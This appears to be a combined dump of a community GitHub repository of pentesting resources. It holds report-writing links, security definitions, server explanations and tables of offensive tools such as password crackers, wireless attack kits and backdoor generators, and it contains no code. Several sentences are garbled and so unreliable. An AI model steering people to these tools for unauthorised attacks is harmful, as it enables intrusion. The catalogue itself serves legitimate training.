[𝗙𝗥𝗘𝗘 𝗥𝗘𝗦𝗢𝗨𝗥𝗖𝗘𝗦 / 𝗣𝗘𝗡𝗧𝗘𝗦𝗧 𝗥𝗘𝗣𝗢𝗥𝗧] - By @Gabrielle_BGB
Want to upgrade your reporting skills?
Check out these resources
👉 𝗦𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲 𝗼𝗳 𝗮 𝗽𝗲𝗻𝘁𝗲𝘀𝘁 𝗿𝗲𝗽𝗼𝗿𝘁
🌟My article on how to write a pentest report:
https://lnkd.in/eH92fT8Q
👉 𝗛𝗼𝘄 𝘁𝗼 𝘁𝗮𝗸𝗲 𝗻𝗼𝘁𝗲𝘀
🌟 Cherry Tree
https://lnkd.in/eqTjHYKi
🌟 Joplin
https://joplinapp.org/
🌟 Keepnote
http://keepnote.org/
👉 𝗧𝗶𝗽𝘀 𝗳𝗿𝗼𝗺 𝗘𝘅𝗽𝗲𝗿𝘁𝘀
🌟 Writing Tips for IT Professionals by Lenny Zeltser
https://lnkd.in/eMSiEpeZ
🌟 How to write a Penetration Testing Report by HackerSploit
https://lnkd.in/ekSu5vAp
👉 𝗔𝘂𝘁𝗼𝗺𝗮𝘁𝗶𝗼𝗻
🌟 Blackstone project by micro-joan
https://lnkd.in/eBSy58Ur
🌟 Pentext by Radically Open Security
https://lnkd.in/eNPhHHdx
👉 𝗘𝘅𝗮𝗺𝗽𝗹𝗲𝘀 𝗼𝗳 𝗿𝗲𝗽𝗼𝗿𝘁𝘀
🌟 A list of public pentest reports by juliocesarfort
https://lnkd.in/ebeJwVXQ
🌟 A list of bug bounty writeup on Pentester Land
https://lnkd.in/e4G9xB9A
================================================
FILE: Pentesting_for_Researchers/Readme.md
================================================
# PEN TESTERS (Under Development)
1. Company have PEN TESTERS team to conduct pentesting.
2. Company HIRING PEN TEST SERVICES - on hourly basis or project basis.
- A list of [Privacy & Security Resources](https://docs.hackliberty.org/books/privacy-security/page/privacy-security-resources)
# PentestingEbook overview:
Author Pentesting | Title
-- | --
1. [Practicle Hardware pentesting](https://t.me/freedomf0x/16886)
2. [Pentesting Industrial Control Stytem.](https://t.me/freedomf0x/16889)
3. [Network Pentesting](https://t.me/freedomf0x/12884)
4. [Web pentesting 1](https://t.me/freedomf0x/16879)& [Web pentesting 2](https://t.me/freedomf0x/14577)
5. [Pentesting Azure](https://t.me/freedomf0x/16891) , [window server](https://t.me/freedomf0x/15382), [powershell, and active directory](https://t.me/freedomf0x/12882)
- Mobile Application Pentesting:
- [OWASP Mobile Application Security](https://mas.owasp.org/)
- [eLearnSecurity Mobile Application Penetration Testing (eMAPT) Notes ANDROID by Joas](https://drive.google.com/file/d/1vDPzDhGZiRXWPGZ4Yk2grBzA0ouE2KMw/view)
- [Mobile Pentesting Roadmap](https://medium.com/@rezaduty/mobile-penetration-tester-roadmap-f2ec9bd68dcf)
- [Mobile Application Penetration Testing Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet)
- [TDI 2022 - Android Application Hacking Talk](https://csbygb.gitbook.io/pentips/talks/android-app)
# Pentesting for Researchers
Author Pentesting | Title
-- | --
**1** Vulnerabilityassessment | [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)
**2** Elijah | [Pentesting Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes)
**3** Chryzsh | [Beginner Friendly's Pentesting](https://chryzsh.gitbooks.io/pentestbook/content/)
**4** Pentesting Standard | [High Level Pentesting Standard](http://www.pentest-standard.org/index.php/Main_Page))
**5** Phases of Infrastructure Pentest | [All the phases of Infrastructure Pentest](https://bitvijays.github.io/index.html)
**6** Sdcampbell | [Internal Network Penetration Test Playbook ](https://github.com/sdcampbell/Internal-Pentest-Playbook)
**7** Red team/Bug Bounty Security Referances | [by s0cm0nkey](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/web-app-hacking)
**8** enaqx | [Awsome Pentest](https://github.com/enaqx/awesome-pentest)
**9** Gabrielle_BGB | [Pentest Tips](https://github.com/CSbyGB/pentips)
**10** Wordlists | [All Wordlists](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists.md)
Author | Pentesting Checklist
-- | --
**1** | [Pentesting Checklist](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/PentestingChecklist)
**1** | [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)
Author | Pentesting Mindmap
-- | --
**1** | [Internal-Network-Pentest-MindMap](https://github.com/sdcampbell/Internal-Network-Pentest-MindMap)
Author | Pentesting Cheetsheet
-- | --
**1** | [Pentesting Cheetsheet](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/cheetsheets)
**2** | [hausec - pentesting cheetsheet](https://hausec.com/pentesting-cheatsheet/)
**3** | [ired - offensive-security-cheetsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)
**4** | [anhtai - beginner friendly penetsting cheetsheet](https://anhtai.me/pentesting-cheatsheet/)
**5** | [coreb1t Collection of the cheat sheets useful for pentesting:](https://github.com/coreb1t/awesome-pentest-cheat-sheets)
**6** | [Randomkeystrokes - Wifi Pentesting Command Cheatsheet](https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/)
**7** | [NEED TO UPDATE - pentesting-with-powershell-in-six-steps](https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/)
Author | Pentesting Tools
-- | --
**1** S3cur3Th1sSh1t | [Pen Testing Tools ](https://github.com/S3cur3Th1sSh1t/Pentest-Tools)
Author | Pentesting Labs
-- | --
**1** | [Practice Labs for Pentesting ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Pentesting_for_Researchers/PTplatform.md)
## Tools
- [Oh-My-Zsh-theme-for-pentesters which includes the date, time, and IP address for pentest logging.](https://github.com/sdcampbell/lpha3cho-Oh-My-Zsh-theme-for-pentesters)
## ASK Questions related to Pentesting
-- | --
**1** | [Wednesday Offensive - REDSIEGE]
30 Minutes of conversations with people around the industry with Tim Medin and the Red Siege Team. Open to everyone, questions welcome!
Join us Wednesdays in an open conversation live video chat format. No Slides, Just talk! Topics will vary depending on guests, but conversations are open to everyone. You only need to register the first time and you're set for all future Wednesday Offensive conversations.
[Zoom Meeting ID,passcode & link:842 7796 4949, 957717](https://us02web.zoom.us/w/84277964949?tk=c9Sq_ZUmgkIXWjmc9IFvz5JElMlmba3ll1gnawypC-8.DQMAAAATn1uwlRZTVWhXZy1HZVFwQ1k2VHRPMVNMU1FRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&pwd=LTWU2D9UAWMiSBE2gNF8yk8k8S95SJ9bAT)
Aug 10, 2022 12:30 PM
================================================
FILE: README.md
================================================
## Let's crowdsource our infosec learning with [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER)
<p align=""> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="Resources" /> </p>
Hey folks! ResetHacker community is open for contributers and Everyone is welcome to contribute here.
## Contributing - [Must Read me :)](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CONTRIBUTING.md)
As of writing, there are no code contributors to the main project.
However, You can contribute to learning purpose resources that includes Conference, jobs, Writeups, Tutorials, Bugbounty helpdesk, pentesting helpdesk, How to get started, Review on courses etc. or modifing the README.md or any other repository.
**We're inviting community contributers for early stage cybersecurity HELPDESK. This project is not limited to bugbounty or pentesting. Anyone is welcome to contribute.**
## Rules are simple to crowdsource our learning.
- Pick a topic from your domain or ADD domain or choose new topics that you find helpful for community.
- If you still have question feel free to create an issue on github or want to contribute to this project as a member of Team. DM me on telegram @Attr1b or mail me to resethackerofficial@gmail.com
---
Index | Topics
---|---
**0** | [Weekly InfoSec update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)
**1** | [CVE Poc and Exploit That matter](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)
**1** | [BugBounty-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)
**2** | [Cybersecurity Jobs-Helpdesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting/blob/main/CyberSecurityJobs/Readme.md)
**3** | [CyberSecurity Conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)
**4** | [Pentesting pre-engagement, NDA form, Report samples, timeline etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/PentestingReports)
**5** | [Pentesting for Researchers](https://github.com/RESETHACKER-COMMUNITY/Pentesting/tree/main/Pentesting_for_Researchers)
- **Contributors** 💪😎
>Thanks a lot for spending your time helping! Keep rocking 🍻
<!-- readme: contributors -start -->
<table>
<a href="https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/graphs/contributors">
<img src="https://contrib.rocks/image?repo=RESETHACKER-COMMUNITY/Pentesting-Bugbounty" max = {100} />
</a>
</table>
<p>
Note: Contents inside the **RESETHACKER** is to help the community and all
the content belongs to respective Authors and RESETHACKER.
<p>
# Catalog for Enterprises
Index | Topics (Updating Soon)
---|---
**1.** | [Who conducts VAPT?]
**2.** | [Benefit of VAPT?]
**3.** | [Purpose of VAPT?]
**4.** | [Vulnerability serverity & impact analysis.]
**5.** | [Difference between VA & PT?]
# OWASP top 10 (2017 - 2021)
<img width="700" alt="OWASP top 10 mapping" src="https://user-images.githubusercontent.com/25515871/178655070-37eafa42-c714-4ef8-aa5e-eac03c1e776a.png">
# Table of Contents for Community 📚
- [Introduction](#introduction)
- [What is penetration testing?](#what-is-penetration-testing)
- [Want to become a penetration tester?](#want-to-become-a-penetration-tester)
- [Some vocabulary](#some-vocabulary)
- [Difference between hacking and ethical hacking](#difference-between-hacking-and-ethical-hacking)
- [Languages](#languages)
- [Content Management Systems](#content-management-systems)
- [Basic steps of pen testing](#basic-steps-of-pen-testing)
- [Tools by category](#tools-by-category)
- [:male_detective: Information Gathering](#male_detective-information-gathering)
- [:lock: Password Attacks](#lock-password-attacks)
- [:memo: Wordlists](#memo-wordlists)
- [:globe_with_meridians: Wireless Testing](#globe_with_meridians-wireless-testing)
- [:wrench: Exploitation Tools](#wrench-exploitation-tools)
- [:busts_in_silhouette: Sniffing & Spoofing](#busts_in_silhouette-sniffing--spoofing)
- [:rocket: Web Hacking](#rocket-web-hacking)
- [:tada: Post Exploitation](#tada-post-exploitation)
- [:package: Frameworks](#package-frameworks)
- [Books / Manuals](#books--manuals)
- [Discussions](#discussions)
- [Security Advisories](#security-advisories)
- [Must Check out by Awesome resources]
- [Additional resources](#additional-resources)
- [License](#license)
(TOC made with [nGitHubTOC](https://imthenachoman.github.io/nGitHubTOC/))
# Introduction
## What is penetration testing?
Penetration testing is a type of security testing that is used to test the security of an application. It is conducted to find a security risk which might be present in a system.
If a system is not secure, then an attacker may be able to disrupt or take unauthorized control of that system. A security risk is normally an accidental error that occurs while developing and implementing software. For example, configuration errors, design errors, and software bugs, etc. [Learn more](https://www.tutorialspoint.com/penetration_testing/penetration_testing_quick_guide.htm)
## Want to become a penetration tester?
Knowing about risks on the internet and how they can be prevented is very useful, especially as a developer. Web hacking and penetration testing is the v2.0 of self-defense! But is knowing about tools and how to use them really all you need to become a pen tester? Surely not. A real penetration tester must be able to proceed rigorously and detect the weaknesses of an application. They must be able to identify the technology behind and test every single door that might be open to hackers.
This repository aims first to establish a reflection method on penetration testing and explain how to proceed to secure an application. And secondly, to regroup all kind of tools or resources pen testers need. **Be sure to know basics of programming languages and internet security before learning pen testing.**
Also, this is important to inform yourself about the law and what you are allowed to do or not. According to your country, the computer laws are not the same. First, check laws about privacy and surveillance: [Nine eyes countries](https://en.wikipedia.org/wiki/Five_Eyes#Other_international_cooperatives), [Five eyes](https://en.wikipedia.org/wiki/Five_Eyes) and Fourteen Eyes. Always check if what you're doing is legal. Even when it's not offensive, information gathering can also be illegal!
([Table of Contents](#table-of-contents))
# Some popular domains in cybersecurity
**Infosec**: Information security, which is the practice of preventing unauthorized access, use, disclosure, disruption, modification, inspection, recording or destruction of information. The information or data may take any form, e.g. electronic or physical. Infosec can also be a person who practices ethical security. [Wikipedia](https://en.wikipedia.org/wiki/Information_security)
**Opsec**: Operations security, which is a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence, determines if information obtained by adversaries could be interpreted to be useful to them, and then executes selected measures that eliminate or reduce adversary exploitation of friendly critical information. [Wikipedia](https://en.wikipedia.org/wiki/Operations_security)
**Black/grey/white hat hacker**: Someone who uses bugs or exploits to break into systems or applications. The goal and the method differs depending if they're a black, grey or white hat hacker. A black hat is just someone malicious that does not wait permission to break into a system or application. A white hat is *usually* a security researcher who practice ethical hacking. A grey hat is just in the middle of these two kind of hackers, they might want to be malicious if it can be benefit (data breach, money, whistleblowing ...).
**Red team**: According to Wikipedia, a red team or the red team is an independent group that challenges an organization to improve its effectiveness by assuming an adversarial role or point of view. It is particularly effective in organizations with strong cultures and fixed ways of approaching problems. The United States intelligence community (military and civilian) has red teams that explore alternative futures and write articles as if they were foreign world leaders. Little formal doctrine or publications about Red Teaming in the military exist. In infosec exercises, Red teamers are playing the role of attackers. [Wikipedia](https://en.wikipedia.org/wiki/Red_team)
**Blue team**: A blue team is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and to make certain all security measures will continue to be effective after implementation. As a result, blue teams were developed to design defensive measures against red team activities. In infosec exercises, Blue teamers are playing the role of defenders. [Wikipedia](https://en.wikipedia.org/wiki/Blue_team_(computer_security))
**Penetration tester**: An ethical hacker who practices security, tests applications and systems to prevent intrusions or find vulnerabilities.
**Security researcher**: Someone who practices pen testing and browses the web to find phishing/fake websites, infected servers, bugs or vulnerabilities. They can work for a company as a security consultant and are most likely a Blue teamer.
**Reverse engineering**: Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object. Similar to scientific research, the only difference being that scientific research is about a natural phenomenon. [Wikipedia](https://en.wikipedia.org/wiki/Reverse_engineering)
**Social engineering**: In the context of information security, it refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme. The term "social engineering" as an act of psychological manipulation of a human, is also associated with the social sciences, but its usage has caught on among computer and information security professionals. [Wikipedia](https://en.wikipedia.org/wiki/Social_engineering_(security))
**Threat analyst**: A threat hunter, also called a cybersecurity threat analyst, is a security professional or managed service provider (MSP) that proactively uses manual or machine-assisted techniques to detect security incidents that may elude the grasp of automated systems. Threat hunters aim to uncover incidents that an enterprise would otherwise not find out about, providing chief information security officers (CISOs) and chief information officers (CIOs) with an additional line of defense against advanced persistent threats (APTs). [SearchCIO](https://searchcio.techtarget.com/definition/threat-hunter-cybersecurity-threat-analyst)
**site reliability engineer (SRE)**:
**Pipeline**:
**CI/CD pipeline**:
**DevOps**:
**DevSecOps**:
([Table of Contents](#table-of-contents))
## Difference between practising penetration testing and ethical hacking
A black hat is practicing penetration testing, but unlike a white hat, this is not ethical hacking. Ethical hacking is about finding vulnerabilities and improve and security of a system. An ethical hacker is the ultimate security professional. Ethical hackers know how to find and exploit vulnerabilities and weaknesses in various systems, jusTheycious hacker (a black hat hacker). In fact, they both use the same skills; however, an ethical hacker uses those skills in a legitimate, lawful manner to try to find vulnerabilities and fix them before the bad guys can get try to break in. An ethical hacker is basically a white hat hacker.
## Difference between SRE and Devops
## **Differnece B/w DAST, SAST And IAST**
([Table of Contents](#table-of-contents))
# Languages
Learning programming is the very first way to start learning about security. There's a lot of languages, most people start with Python, it's the easiest and the most popular one. PHP and Go are the less popular to write security-related stuff, but any of these can still be used in such context. Bash and Powershell are mostly about scripting and writing simple CLI applications.
Since not all languages work the same way, you need to look at how they work and what you want to learn. For example, C++ and Java compile, PHP and Pyththey are interpreted languages. This definitely changes what you ld use them for. Each language also has its own design patterns.
### Scripting
- Bash
- Powershell
### Software & mobile apps
- JavaScript
- Java
- Swift
- C / C++ / C#
### General purpose
- Go
- [Python](https://github.com/dloss/python-pentest-tools)
- Ruby
- Perl
- PHP
([Table of Contents](#tableWordPressnts))
# Content Management Systems
These are the most used Content Management Systems (CMS). See a complete list [here](https://en.wikipedia.org/wiki/List_of_content_management_systems).
# SERVER : A server is a central repository or the part of web hosting infrastructure that hosts websites.
## **1. Web Server:**
Web server will receive all the requests from sent by visitors visiting your website and also forward only the business requests to application server.
The static assets (like CSS, JS components , Web components eg Common images, resources files and html components) will be served from your web server itself.
Web server runs on Microsoft IIS:ASP(.NET), Apache: Php/CGI, Apache Tomcat: Servlet, Nginx, HTTPD ,Jetty: Servlet
or even Python's Simple HTTPServer etc.
Web servers primarily respond to HTTP / HTTPS requests however isn't restricted to simply communications protocol.
It may be provided alternative protocol support like RMI/RPC.
**Front End (Web UI) <-> BackEnd (API) <-> Web server (web page and graphics files) <-> Load Balancer <-> Application Server(Templete pages code & data) <-> DataBase (Couch DB + MySql + Elasstic DB + MongoDB + Firebase )**
## **2. Application server:**
Application server is the server that works between Web server and database server and basically Generate (dynamic content/assets by executing server
side code eg JSP, servlet or EJB), manages(Transaction Support, Messaging support etc), processes the data(connection Pooling, object pooling etc)
and host application etc and application server will be responsible for only business requests (like Login, Fetching details and etc,. )
○ MTS: COM+
○ Email server
○ WAS: EJB
○ JBoss: EJB
○ WebLogic Application Server: EJB
○ Google maps servers
○ Google search servers
○ Google docs servers
○ Microsoft 365 servers
○ Microsoft computer vision servers for AI.
• Application servers
Application Server can do whatever Web Server is capable and respond to any number of protocols depending on the application business logic.
## **3. Database Server:**
Database server handles database queries and It can only accessed by application server. It runs on MySQL, PostgreSQL, MariaDB, etc Database servers use protocols ODBC, JDBC, etc.
**Please note:**
• Web Server is designed to serve HTTP static Content like HTML, images etc. and for the dynamic content have plugins to support
scripting languages like Perl, PHP, ASP, JSP etc
• Web container is a part of Web Server and the Web Server is a part of Application Server.
• A Web Server in java is also known as a web container or a servlet container which has a limited set of Java EE features like Servlets, JSP etc.
Ex: Apache Tomcat.
• An Application Server has a web container in it as well as full java EE features like Java Mail Service, JPA, JSF etc.
Ex:Glassfish, Apache TomEE, JBoss or Wildfly(new name ), IBM websphere etc.
• If you have a Java application with just JSP and Servlet to generate dynamic content then you need web containers like Apache Tomcat or Jetty.
While, if you have Java EE application using EJB, distributed transaction, messaging and other fancy features than
you need a full fledged application server like JBoss, WebSphere or Oracle's WebLogic.
• The use of Load Balancer is to distribute the load between multiple application servers.
• Application server can only accessed via web server, database server can only accessed by application server.
• If you want to solve web server and application server purposes in one server, I would like to prefer you a
VPS hosting servers and dedicated hosting servers.It is because they host volumes of web projects and applications with a higher uptime.
From <https://www.quora.com/Whats-the-diference-between-an-application-server-and-a-web-server>
https://developer.mozilla.org/en-US/docs/Learn/Common_questions/Pages_sites_servers_and_search_engines
([Table of Contents](#table-of-contents))
# cloud servers
# Basic steps of pen testing
<p align="center">
<img src="https://www.tutorialspoint.com/penetration_testing/images/penetration_testing_method.jpg">
</p>
*Source: [tutorialspoint](https://www.tutorialspoint.com/penetration_testing/index.htm)*
[Read more about pen testing methodology](https://www.tutorialspoint.com/penetration_testing/penetration_testing_method.htm)
([Table of Contents](#table-of-contents))
# Tools by category
A more complete list of tools can be found on [Kali Linux official website](https://tools.kali.org/tools-listing).
#### :male_detective: Information Gathering
Information Gathering tools allows you to collecinformationata about services and users. Check informations about a domain, IP address, phone number or an email address.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [theHarvester](https://github.com/laramies/theHarvester) | **Python** | `Linux/Windows/macOS` | E-mails, subdomains and names Harvester. |
| [CTFR](https://github.com/UnaPibaGeek/ctfr) | **Python** | `Linux/Windows/macOS` | Abusing Certificate Transparency logs for getting HTTPS websites subdomains. |
| [Sn1per](https://github.com/1N3/Sn1per) | **bash** | `Linux/macOS` | Automated Pentest Recon Scanner. |
| [RED Hawk](https://github.com/Tuhinshubhra/RED_HAWK) | **PHP** | `Linux/Windows/macOS` | All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers. |
| [Infoga](https://github.com/m4ll0k/Infoga) | **Python** | `Linux/Windows/macOS` | Email Information Gathering. |
| [KnockMail](https://github.com/4w4k3/KnockMail) | **Python** | `Linux/Windows/macOS` | Check if email address exists. |
| [a2sv](https://github.com/hahwul/a2sv) | **Python** | `Linux/Windows/macOS` | Auto Scanning to SSL Vulnerability. |
| [Wfuzz](https://github.com/xmendez/wfuzz) | **Python** | `Linux/Windows/macOS` | Web application fuzzer. |
| [Nmap](https://github.com/nmap/nmap) | **C/C++** | `Linux/Windows/macOS` | A very common tool. Network host, vuln and port detector. |
| [PhoneInfoga](https://github.com/sundowndev/PhoneInfoga) | **Go** | `Linux/macOS` | An OSINT framework for phone numbers. |
#### :lock: Password Attacks
Crack passwords and create wordlists.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [John the Ripper](https://github.com/magnumripper/JohnTheRipper) | **C** | `Linux/Windows/macOS` | John the Ripper is a fast password cracker. |
| [hashcat](https://github.com/hashcat/hashcat) | **C** | `Linux/Windows/macOS` | World's fastest and most advanced password recovery utility. |
| [Hydra](https://github.com/vanhauser-thc/thc-hydra) | **C** | `Linux/Windows/macOS` | Parallelized login cracker which supports numerous protocols to attack. |
| [ophcrack](https://gitlab.com/objectifsecurite/ophcrack) | **C++** | `Linux/Windows/macOS` | Windows password cracker based on rainbow tables. |
| [Ncrack](https://github.com/nmap/ncrack) | **C** | `Linux/Windows/macOS` | High-speed network authentication cracking tool. |
| [WGen](https://github.com/agusmakmun/Python-Wordlist-Generator) | **Python** | `Linux/Windows/macOS` | Create awesome wordlists with Python. |
| [SSH Auditor](https://github.com/ncsa/ssh-auditor) | **Go** | `Linux/macOS` | The best way to scan for weak ssh passwords on your network. |
###### :memo: Wordlists
| Tool | Description |
| ----------- |----------------|
| [All Wordlist at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md) | Wordlists sorted by probability originally created for password generation and testing. |
#### :globe_with_meridians: Wireless Testing
Used for intrusion detection and wifi attacks.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [Aircrack](https://github.com/aircrack-ng/aircrack-ng) | **C** | `Linux/Windows/macOS` | WiFi security auditing tools suite. |
| [bettercap](https://github.com/bettercap/bettercap) | **Go** | `Linux/Windows/macOS/Android` | bettercap is the Swiss army knife for network attacks and monitoring. |
| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |
| [Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) | **Shell** | `Linux/Windows/macOS` | This is a multi-use bash script for Linux systems to audit wireless networks. |
| [Airbash](https://github.com/tehw0lf/airbash) | **C** | `Linux/Windows/macOS` | A POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetratioAccessing. |
#### :wrench: Exploitation Tools
Acesss systems and data with service-oriented exploits.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [SQLmap](https://github.com/sqlmapproject/sqlmap) | **Python** | `Linux/Windows/macOS` | Automatic SQL injection and database takeover tool. |
| [XSStrike](https://github.com/UltimateHackers/XSStrike) | **Python** | `Linux/Windows/macOS` | Advanced XSS detection and exploitation suite. |
| [Commix](https://github.com/commixproject/commix) | **Python** | `Linux/Windows/macOS` | Automated All-in-One OS command injection and exploitation tool. |
#### :busts_in_silhouette: Sniffing & Spoofing
Listen to network traffic or fake a network entity.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [Wireshark](https://www.wireshark.org) | **C/C++** | `Linux/Windows/macOS` | Wireshark is a network protocol analyzer. |
| [WiFi Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) | **Python** | `Linux/Windows/macOS/Android` | Framework for Rogue Wi-Fi Access Point Attack. |
| [Zarp](https://github.com/hatRiot/zarp) | **Python** | `Linux/Windows/macOS` | A free network attack framework. |
#### :rocket: Web Hacking
Exploit popular CMSs that are hosted online.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [WPScan](https://github.com/wpscanteam/wpscan) | **Ruby** | `Linux/Windows/macOS` | WPScan is a black box WordPress vulnerability scanner. |
| [Droopescan](https://github.com/droope/droopescan) | **Python** | `Linux/Windows/macOS` | A plugin-based scanner to identify issues with several CMSs, mainly Drupal & Silverstripe. |
| [Joomscan](https://github.com/rezasp/joomscan) | **Perl** | `Linux/Windows/macOS` | Joomla Vulnerability Scanner. |
| [Drupwn](https://github.com/immunIT/drupwn) | **Python** | `Linux/Windows/macOS` | Drupal Security Scanner to perform enumerations on Drupal-based web applications. |
| [CMSeek](https://github.com/Tuhinshubhra/CMSeek) | **Python** | `Linux/Windows/macOS` | CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and 130 other CMSs. |
#### :tada: Post Exploitation
Exploits for after you have already gained access.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [TheFatRat](https://github.com/Screetsec/TheFatRat) | **C** | `Linux/Windows/macOS` | Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack, dll. |
### pen-testing Frameworks
Frameworks are packs of pen testing tools with custom shell navigation and documentation.
| Tool | Language | Support | Description |
| ----------- |-------------------------|----------|----------------|
| [Operative Framework](https://github.com/graniet/operative-framework) | **Python** | `Linux/Windows/macOS` | Framework based on fingerprint action, this tool is used for get information on a website or a enterprise target with multiple modules. |
| [Metasploit](https://github.com/rapid7/metasploit-framework) | **Ruby** | `Linux/Windows/macOS` | A penetration testing framework for ethical hackers. |
| [cSploit](https://github.com/cSploit/android) | **Java** | `Android` | The most complete and advanced IT security professional toolkit on Android. |
| [radare2](https://github.com/radare/radare2) | **C** | `Linux/Windows/macOS/Android` | Unix-like reverse engineering framework and commandline tools. |
| [Wifiphisher](https://github.com/wifiphisher/wifiphisher) | **Python** | `Linux` | The Rogue Access Point Framework. |
| [Beef](https://github.com/beefproject/beef) | **Javascript** | `Linux/Windows/macOS` | The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. |
| [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF) | **Python** | `Linux/Windows/macOS` | Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. |
| [Burp Suite](https://portswigger.net/burp) | **Java** | `Linux/Windows/macOS` | Burp Suite is a leading range of cybersecurity tools, brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. **This tool is not free and open source** |
([Table of Contents](#table-of-contents))
## Books / Manuals
- [Advance Penetration Testing by Wil Alsoop, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)
- [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
- [The Pentester BluePrint: Starting a Career as an Ethical Hacker](https://www.amazon.in/dp/1119684307/ref=cm_sw_r_cp_apa_i_XMCdGbG3PV2XD) (2014)
- [Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X) - [PDF](https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf) (2017)
- [Cybersecurity - Attack and Defense Strategies](https://www.amazon.com/Cybersecurity-Defense-Strategies-Infrastructure-securit/dp/1788475291) (2018)
- [Android Hacker's Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) (2009)
- [Social Engineering : The Art of Human Hacking](https://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/0470639539) (2010)
- [The Hackers Playbook 2 by Peter Kim](https://amzn.to/2ObGqkU)
## Discussions (Updating Soon)
- [Reddit/HowToHack](https://www.reddit.com/r/HowToHpen-testing) and ask about hacking, security and pen testing.
- [Reddit/hacking](https://www.reddit.com/r/hacking) Discuss about hacking and web security.
- [ax0nes](https://ax0nes.com/) Hacking, security, and software development forum.
- [0Day.rocks on discord](https://discord.gg/WmYzJfD) Discord server about the 0day.rocks blog for technical and general InfoSec/Cyber discussions & latest news.
- [Reddit/AskNetsec](https://www.reddit.com/r/AskNetsec/) Discusadvice network security, ask professionals for advices about jobs and stuff.
## Security Advisories
- [CVE: For publicly known cybersecurity vulnerabilities.](http://cve.mitre.org/)
- [CWE: For software weaknesses and vulnerabilities](http://cwe.mitre.org/)
- [NVD: Largest publicly available source of vulnerability intelligence.](http://web.nvd.nist.gov/)
- [OWASP: Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) - Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.
- [PENTEST-WIKI](https://github.com/nixawk/pentest-wiki) - Free online security knowledge library for pentesters and researchers.
- [PTES: Penetration Testing Execution Standard](http://www.pentest-standard.org/) - Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.
- [Penetration Testing Framework (PTF)](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) - Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.
- [Hackerone reports](https://h1.security.nathan.sx/index.html)
- [Pentester.land](https://pentester.land/list-of-bug-bounty-writeups.html)
## Must Checkout
